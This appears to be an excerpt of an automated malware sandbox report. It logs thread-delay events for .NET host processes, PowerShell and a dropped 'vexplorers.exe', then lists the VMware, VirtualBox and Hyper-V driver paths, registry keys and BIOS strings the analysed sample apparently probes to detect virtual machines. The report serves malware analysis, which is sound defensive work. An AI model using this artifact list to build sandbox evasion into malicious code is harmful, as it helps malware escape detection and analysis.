                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599647
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599293
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599052
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598935
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99855
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99542
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99413
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99263
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99139
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99029
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98907
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98077
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97965
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97850
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97731
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97614
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97350
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97184
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97068
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96823
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96385
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96252
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96120
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95872
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95759
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95651
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95528
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95183
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94986
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593306
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593178
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99555
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99448
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98875
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598774
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99732
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99391
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99266
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98708
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97700
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97346
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 97109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96980
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96634
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96406
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96121
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96013
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95543
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95432
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593873
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99869
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99741
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99606
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99464
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99332
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99174
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 99034
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 98266
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96808
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96664
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96368
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 96155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95961
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95824
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95655
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95524
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95386
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95261
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95148
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 95029
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 94919
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 94802
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 94675
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 94555
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599838
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599709
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599567
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599429
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599216
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599023
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598717
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99876
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99613
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99192
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99064
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98945
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98716
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98593
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98374
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98265
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98027
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97901
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97671
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97561
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97233
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 97015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96796
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 96030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 95921
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 95812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 95702
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 95588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99403
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99282
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 99046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 98438
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeThread delayed: delay time: 922337203685477
                    Source: Amcache.hve.18.drBinary or memory string: VMware
                    Source: Amcache.hve.18.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.18.drBinary or memory string: VMware, Inc.
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: Amcache.hve.18.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.18.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.18.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.18.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: svchost.exe, 00000008.00000002.2008316470.000001A4FFF3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000008.00000002.2008581063.000001A4FFF5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: Amcache.hve.18.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: Amcache.hve.18.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: Amcache.hve.18.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                    Source: Amcache.hve.18.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Amcache.hve.18.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.18.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin`
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: Amcache.hve.18.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: Amcache.hve.18.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.18.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.18.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.18.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.18.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.18.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.18.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: Amcache.hve.18.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.18.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.18.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
